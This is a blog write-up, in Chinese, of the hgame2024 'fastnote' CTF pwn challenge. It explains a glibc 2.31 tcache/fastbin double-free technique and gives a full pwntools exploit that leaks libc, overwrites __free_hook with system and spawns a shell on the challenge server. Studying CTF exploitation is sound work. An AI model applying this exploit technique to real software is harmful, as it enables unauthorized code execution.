hgame2024 week2 - fastnote

hgame2024 week2 - fastnote

RocketDev
  2024-02-15 19:38 2024-02-15 19:38 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

Fast note can't be edited

文件属性

属性
Arch x64
RELRO Full
Canary on
NX on
PIE on
strip no

解题思路

glibc 2.31,相比Elden Ring II少了edit函数,leak时脚本一样, 主要难点在构造tcache dup,构造完成以后打free hook即可

构造思路就是先填满tcache,然后做fastbin dup,接着分配chunk使fastbin被stash到tcache里, 再写地址并分配就可以达成任意地址写(这部分思路同old_fastnote)

为什么tcache里是3个chunk?

此时,fastbin头指向的chunk不再有效(错位了),故最后tcache里有且仅有3个chunk
(个人想法,不一定正确,有正确的说法可以评论)

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
from pwn import *
context.terminal = ['tmux','splitw','-h']

def payload(lo:int):
    global sh
    if lo:
        sh = process('./fastnote')
        if lo & 2:
            gdb.attach(sh)
    else:
        sh = remote('106.14.57.14', 32414)
    libc = ELF('./libc-2.31.so')

    def addn(idx:int, size:int, content:bytes=b' ', hooked:bool=False):
        sh.sendlineafter(b'ice:', b'1')
        sh.sendlineafter(b'Index', str(idx).encode())
        sh.sendlineafter(b'Size', str(size).encode())
        if hooked:
            return
        sh.sendlineafter(b'Content', content)

    def deln(idx:int):
        sh.sendlineafter(b'ice:', b'3')
        sh.sendlineafter(b'Index', str(idx).encode())

    def show(idx:int) -> bytes:
        sh.sendlineafter(b'ice:', b'2')
        sh.sendlineafter(b'Index: ', str(idx).encode())
        return sh.recvline()

    # leak libc addr (unsorted bin)
    addn(0, 0x80)
    addn(1, 0x80)
    addn(2, 0x80)
    addn(3, 0x80)
    addn(4, 0x80)
    addn(5, 0x80)
    addn(6, 0x80)
    addn(7, 0x80)
    deln(7)
    deln(6)
    deln(5)
    deln(4)
    deln(3)
    deln(2)
    deln(1)
    deln(0) # 1-7 in tcache, 0 in unsorted bin
    ret = show(0)

    dumpArena = libc.symbols['__malloc_hook'] + (libc.symbols['__malloc_hook'] - libc.symbols['__realloc_hook']) * 2
    mainArena = u64(ret[:6] + b'\0\0')
    libcBase = mainArena - dumpArena - 0x60 # sub unsorted bin offset
    print(f'\x1b[33mleak libcBase: {hex(libcBase)}\x1b[0m')
    freeHook = libcBase + libc.symbols['__free_hook']
    systemAddr = libcBase + libc.symbols['system']

    # double free to alloc at freeHook
    addn(15, 0x28) # there is a 0x30-size chunk in tcache and causing double free detection
    addn(0, 0x18)  # so we need to alloc it to solve it
    addn(1, 0x18)
    addn(2, 0x18)
    addn(3, 0x18)
    addn(4, 0x18)
    addn(5, 0x18)
    addn(6, 0x18)
    addn(7, 0x18)
    addn(8, 0x18)
    deln(8)
    deln(7)
    deln(6)
    deln(5)
    deln(4)
    deln(3)
    deln(2) # 2-8 in tcache
    deln(1)
    deln(0)
    deln(1) # in fastbin: head -> 1 -> 0 -> 1
    addn(14, 0x18)
    addn(14, 0x18)
    addn(14, 0x18)
    addn(14, 0x18)
    addn(14, 0x18)
    addn(14, 0x18)
    addn(14, 0x18) # consume tcache
    addn(0, 0x18, p64(freeHook)) # thead -> 1 -> 0 -> freeHook
    addn(1, 0x18)
    addn(2, 0x18)
    addn(3, 0x18, p64(systemAddr)) # write systemAddr on freeHook
    addn(4, 0x48, b'/bin/sh\0')
    deln(4) # invoke shell

    sh.clean()
    sh.interactive()
  • 标题: hgame2024 week2 - fastnote
  • 作者: RocketDev
  • 创建于 : 2024-02-15 19:38:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2024/02/15/W2_fastnote/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
hgame2024 week2 - fastnote
  1. 文件属性
  2. 解题思路
  3. 为什么tcache里是3个chunk?
  4. EXPLOIT